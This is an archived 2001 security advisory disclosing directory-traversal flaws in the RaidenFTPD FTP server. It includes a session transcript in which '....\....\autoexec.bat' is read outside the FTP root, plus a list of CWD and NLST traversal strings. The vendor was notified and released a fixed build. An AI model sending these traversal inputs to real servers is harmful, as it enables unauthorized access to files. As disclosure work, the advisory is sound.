Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
From: joetestaHUSHMAIL.COM
Date: Wed Apr 25 2001 - 20:13:06 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ----- Begin Hush Signed Message from joetestahushmail.com -----

    Vulnerabilities in RaidenFTPD Server


    RaidenFTPD v2.1 is an ftp server available from
    http://playstation2.idv.tw/raidenftpd. Vulnerabilities exist which allow
    users to break out of the ftp root.


    The following is an illustration of the problem:

    > ftp localhost
    220-This FTP site is running free version of RaidenFTPD
    220-Download chinese version from http://playstation2.idv.tw/raiden-ftpd-
    220-Download english version from http://playstation2.idv.tw/raidenftpd/
    220-RaidenFTPD32 for RaidenFTPD (up since 2001/04/20 15:00)
    220-This server is for private use only
    220-If you do not have access to this server
    220-Please disconnect now
    220 Please enter your login name now.
    User (xxxxxxxx.rh.rit.edu:(none)): jdog
    331 Password required for jdog .
      [really long login banner edited out]
    230 User jdog logged in , proceed.
    ftp> get ....\....\autoexec.bat
    200 Port command ok.
    150 Sending /....\....\autoexec.bat (419 bytes). Mode STREAM Type ASCII
    226-++s+u_z U : 419 _+_+ W : 0 _+_+
    226-+Ut+O : 419 kb/sec _z Unlimited kb U+B+
    226-+e++O /
    226 Transfer finished successfully. Data connection closed.
    ftp: 419 bytes received in 0.27Seconds 1.55Kbytes/sec.
    ftp> cd ....
    250-++-U+ 1323 mb
    250 "/.." is current directory.

    This excerpt was taken from a session involving build #947. The vendor
    four builds since I initially contacted them to address additional
    variations. The following is a list of vulnerabilities which affected
    these intermediate versions:

    CWD \....
    CWD *\.....
    CWD /..../
    NLST ..
    NLST ...
    NLST \..\
    NLST \...\


    Upgrade to build #952 at:

        Vendor Status

    Team JohnLong was contacted via <jlkplaystation2.idv.tw> on
    Friday, April 20, 2001. They quickly responded and worked diligently
    on the problems until all issues were fixed.

        - Joe Testa

    e-mail: joetestahushmail.com
    web page: http://hogs.rit.edu/~joet
    AIM: LordSpankatron

    ----- Begin Hush Signature v1.3 -----
    ----- End Hush Signature v1.3 -----

    This message has been signed with a Hush Digital Signature.
    To verify the signature, please go to www.hush.com/tools

    Free, encrypted, secure Web-based email at www.hushmail.com